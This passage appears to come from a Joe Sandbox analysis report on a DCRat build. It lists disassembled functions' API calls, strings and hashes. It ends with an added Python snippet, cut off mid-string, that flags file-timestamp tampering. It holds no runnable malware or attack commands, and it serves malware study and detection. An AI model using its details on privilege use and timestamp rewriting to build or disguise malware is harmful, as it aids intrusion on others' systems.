                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: bee857888f09722f416fa3e834fabf71636909f6ea3ae5c6c393edbe5658b28a
                                      • Instruction ID: 73d1dea748fb1838f3d9b4a7231eb9d121f4c6e0a31776f9e8f178f4a9491510
                                      • Opcode Fuzzy Hash: bee857888f09722f416fa3e834fabf71636909f6ea3ae5c6c393edbe5658b28a
                                      • Instruction Fuzzy Hash: 6D41D432E007149FCB10EF78D881A5EB7F6EF85724F1645A8E915EB281DB31AD01EB80
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00F2B619
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2B63C
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F2B662
                                      • _free.LIBCMT ref: 00F2B675
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2B684
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 993362e6d26ecec9a50b5c10a48c876b1c65ea6f6770a84c602638e097c3c886
                                      • Instruction ID: 8fa081c62df4b5005bf40af96a2261ef9afb31ac23755ba525f8eb7ee2710221
                                      • Opcode Fuzzy Hash: 993362e6d26ecec9a50b5c10a48c876b1c65ea6f6770a84c602638e097c3c886
                                      • Instruction Fuzzy Hash: 3901B162A02225BF632166B67C99C7B7F6DDAC6BB13140268BD04C2110DF65CD01B1B1
                                      APIs
                                      • GetLastError.KERNEL32(?,00F40EE8,00000200,00F2895F,00F258FE,?,?,?,?,00F0D25E,?,02FC34C0,00000063,00000004,00F0CFE0,?), ref: 00F2902E
                                      • _free.LIBCMT ref: 00F29063
                                      • _free.LIBCMT ref: 00F2908A
                                      • SetLastError.KERNEL32(00000000,00F33958,00000050,00F40EE8), ref: 00F29097
                                      • SetLastError.KERNEL32(00000000,00F33958,00000050,00F40EE8), ref: 00F290A0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 82a0583e40207970045093df2a35014200ebc0334a7f18b18f1af63546b1f664
                                      • Instruction ID: 1dc11b56f8fe71928cb2d41e33070d46af5e8b461aa51997b932f76dad1e3e55
                                      • Opcode Fuzzy Hash: 82a0583e40207970045093df2a35014200ebc0334a7f18b18f1af63546b1f664
                                      • Instruction Fuzzy Hash: 9601F9B2A09A386BD322E7757C85A2B3A1E9FC07B5B250024F51593192DFA88C027151
                                      APIs
                                        • Part of subcall function 00F10A41: ResetEvent.KERNEL32(?), ref: 00F10A53
                                        • Part of subcall function 00F10A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F10A67
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F1078F
                                      • CloseHandle.KERNEL32(?,?), ref: 00F107A9
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00F107C2
                                      • CloseHandle.KERNEL32(?), ref: 00F107CE
                                      • CloseHandle.KERNEL32(?), ref: 00F107DA
                                        • Part of subcall function 00F1084E: WaitForSingleObject.KERNEL32(?,000000FF,00F10A78,?), ref: 00F10854
                                        • Part of subcall function 00F1084E: GetLastError.KERNEL32(?), ref: 00F10860
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: 024b5ffd1d2d027df74e54e3d783d8936b15daf0730c61ed1fcf652fc9339621
                                      • Instruction ID: f8dd606217f482bfe9e9efc0a93d9427661ba9ebd09090af86cf8424ab258556
                                      • Opcode Fuzzy Hash: 024b5ffd1d2d027df74e54e3d783d8936b15daf0730c61ed1fcf652fc9339621
                                      • Instruction Fuzzy Hash: 7D01B971544708EFC731DB65DD84FC6BBEAFB44721F000519F15A821A0CBB97684EB50
                                      APIs
                                      • _free.LIBCMT ref: 00F2BF28
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F2BF3A
                                      • _free.LIBCMT ref: 00F2BF4C
                                      • _free.LIBCMT ref: 00F2BF5E
                                      • _free.LIBCMT ref: 00F2BF70
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7700ba42c5b90711278c93b080af92b175acaa72084dc153857b8f6803c7f9ee
                                      • Instruction ID: 986d9936171437755ebe894c077d6abeeae14bb62b693224ead798e1733318f4
                                      • Opcode Fuzzy Hash: 7700ba42c5b90711278c93b080af92b175acaa72084dc153857b8f6803c7f9ee
                                      • Instruction Fuzzy Hash: A6F01232909225A7C620EBE4FF86C1673EABE007707644845F849D7D90CB34FC81BA54
                                      APIs
                                      • _free.LIBCMT ref: 00F2807E
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F28090
                                      • _free.LIBCMT ref: 00F280A3
                                      • _free.LIBCMT ref: 00F280B4
                                      • _free.LIBCMT ref: 00F280C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 2a278bba00a65008b0c35f3d8ad49c4400d39ceef1b561b6cfb76d879ae464c5
                                      • Instruction ID: 4768b16a7329f49ca7b91a02c1b1e9e4684158013a746b6f51761ef6230ea15d
                                      • Opcode Fuzzy Hash: 2a278bba00a65008b0c35f3d8ad49c4400d39ceef1b561b6cfb76d879ae464c5
                                      • Instruction Fuzzy Hash: 0CF0177880212D8BC751BB55FC114053A65BB1476030C465AF42296AB1CF760856BFC1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F07579
                                        • Part of subcall function 00F03B3D: __EH_prolog.LIBCMT ref: 00F03B42
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F07640
                                        • Part of subcall function 00F07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07C04
                                        • Part of subcall function 00F07BF5: GetLastError.KERNEL32 ref: 00F07C4A
                                        • Part of subcall function 00F07BF5: CloseHandle.KERNEL32(?), ref: 00F07C59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      • Opcode ID: 648f23c1ebde7225d9e258c6e32653aff1bbe5c3ee8c790c3e03dc5b79d883c3
                                      • Instruction ID: fa44d2e332c0a90399feaa0d0c41ceaa4f88d6e9ba11b93d9923b4e3297f946a
                                      • Opcode Fuzzy Hash: 648f23c1ebde7225d9e258c6e32653aff1bbe5c3ee8c790c3e03dc5b79d883c3
                                      • Instruction Fuzzy Hash: A031B071E08348AEDF20EB649C01BEE7B79AF55324F044099F845A7182DBB95A44FB61
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1A4B8
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F1A4CD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1A4E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: 79ac12ba20b18c276a2390038c2b6901d2d44c2ed5140bbeb5676dc261c1be61
                                      • Instruction ID: cd681cedf071ec7cbbf6e7b835ef0e78fb559628cae14fa702917f003eee08c7
                                      • Opcode Fuzzy Hash: 79ac12ba20b18c276a2390038c2b6901d2d44c2ed5140bbeb5676dc261c1be61
                                      • Instruction Fuzzy Hash: 1911E232646214BFE621CFA8DD0DFAA37A9EB4B310F140004F2419B0B0CBE69841F723
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      • Opcode ID: 97fbc1480e8d1aa52fde7454b3d3a588cecaf282416a96dce3bf02a1d47e3283
                                      • Instruction ID: 65087acb8da5c5b49fda578c37941f0db4d81087dfb87003a4313e56969bb4bd
                                      • Opcode Fuzzy Hash: 97fbc1480e8d1aa52fde7454b3d3a588cecaf282416a96dce3bf02a1d47e3283
                                      • Instruction Fuzzy Hash: 0A215E7294020CEAEB20DEE4CD46FEE7BA8AF04710F040512FA15961E2E775DA59FB61
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1A9DE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F1A9F6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F1AA24
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1
                                      • API String ID: 445417207-3292211884
                                      • Opcode ID: 8b426c25f3e49b10f9add448caf14d3702917839089aa805ef0a672a17bce38a
                                      • Instruction ID: 4c339901ec51ba699ae7a46edd37742518b8e459144290f18ac390c65807ad8b
                                      • Opcode Fuzzy Hash: 8b426c25f3e49b10f9add448caf14d3702917839089aa805ef0a672a17bce38a
                                      • Instruction Fuzzy Hash: 2B110433941118BADB219A649D49FFA7B6CEF4A721F000026FA45B30D0C2A999D5F6A2
                                      APIs
                                      • _swprintf.LIBCMT ref: 00F0B51E
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • _wcschr.LIBVCRUNTIME ref: 00F0B53C
                                      • _wcschr.LIBVCRUNTIME ref: 00F0B54C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: 2de05f996d6ab750cfad47015ec2b4715780ecd9dbd47c0d31cfd036d638909c
                                      • Instruction ID: 3b4e786430a58bd0e84901f71239f2167eb8c9b8bd6d42eaa2561d4a9d331fd4
                                      • Opcode Fuzzy Hash: 2de05f996d6ab750cfad47015ec2b4715780ecd9dbd47c0d31cfd036d638909c
                                      • Instruction Fuzzy Hash: 7001F953904311BACB30AB75AC43D7BB7ACEE95370B584456F945C60C5FB38D950F2A1
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F0ABC5,00000008,?,00000000,?,00F0CB88,?,00000000), ref: 00F106F3
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F0ABC5,00000008,?,00000000,?,00F0CB88,?,00000000), ref: 00F106FD
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F0ABC5,00000008,?,00000000,?,00F0CB88,?,00000000), ref: 00F1070D
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00F10725
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 092c9bb5b6786cb8032c94f28100201bbc6eda032e9d887aedfd1ed84415d9b1
                                      • Instruction ID: c9fc471a0b70070d2a1bbf9c43a6d3b37bec1d5f22b694fd392ae16ee1801088
                                      • Opcode Fuzzy Hash: 092c9bb5b6786cb8032c94f28100201bbc6eda032e9d887aedfd1ed84415d9b1
                                      • Instruction Fuzzy Hash: C311A0B1900709AFC3215F65CC84AA7FBECEB94765F10482EF1DA82240DAB169C0EB60
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 26ab1fd1e6720a4b678e68d5f1bd699d78d9faa95b6118ba48cd7046dcd500de
                                      • Instruction ID: 8fd6170d0eb2b4eba5b5d88e73c0eb098968a9b4910d43ee39913c6da5be1bab
                                      • Opcode Fuzzy Hash: 26ab1fd1e6720a4b678e68d5f1bd699d78d9faa95b6118ba48cd7046dcd500de
                                      • Instruction Fuzzy Hash: 9301B57590024DAFDB11CF14ED04A9A3BA9E7163A1F040421F905D3230C671AC90FBA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction ID: 71b8445bca380cb362a33a8e27aabad5b96f5863839e42bddf85d33046003ce7
                                      • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction Fuzzy Hash: D8A18C32D083669FDB11DF58E8917AEBBE5EF51320F14416DE4859B2C1C2B89C42E750
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00F080B7,?,?,?), ref: 00F0A351
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00F080B7,?,?), ref: 00F0A395
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00F080B7,?,?,?,?,?,?,?,?), ref: 00F0A416
                                      • CloseHandle.KERNEL32(?,?,00000000,?,00F080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0A41D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      • Opcode ID: d63aeae02533788c7893e9b292bf0f1a2d336381641db6db3d44b464e1d3ace3
                                      • Instruction ID: 098dab71364dc890c262f207ff1f67dd73bc1c54d8c757ea2ced7f80e01ca341
                                      • Opcode Fuzzy Hash: d63aeae02533788c7893e9b292bf0f1a2d336381641db6db3d44b464e1d3ace3
                                      • Instruction Fuzzy Hash: 6E41ED71648384AAE731DF24CC45FEEBBE8AB85724F04091CB5D0D31D1D6A99A88FB13
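The record above (function at 00F0A351) opens a file with GENERIC_WRITE (0x40000000 in the second CreateFileW argument) and then calls SetFileTime on it before CloseHandle, so a file this routine drops carries whatever timestamps the sample chose rather than the time of the drop. As an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling, the Python below parses function records in this page's layout (APIs / Strings / Memory Dump Source / Similarity, one record per Instruction Fuzzy Hash) into dicts and flags that write-then-SetFileTime sequence. The regexes and the flag rule are this example's own assumptions about the layout; SAMPLE is constructed and abridged from records on this page.

```python
"""Parse Joe Sandbox per-function records into dicts and flag functions that open a
file for writing and then rewrite its timestamps. Added example: the layout regexes
and the flag rule are assumptions; SAMPLE is constructed/abridged from this page."""
import re
from typing import Dict, List

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function X: ]Api.MODULE(args), ref: ADDR" (no parens for LIBCMT refs)
API_RE = re.compile(r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
                    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
XREF_RE = re.compile(r"^•\s+(?P<s>.*),\s+xrefs:\s+(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")
GENERIC_WRITE = 0x40000000  # dwDesiredAccess bit, second CreateFileW argument

SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00F080B7,?,?,?), ref: 00F0A351
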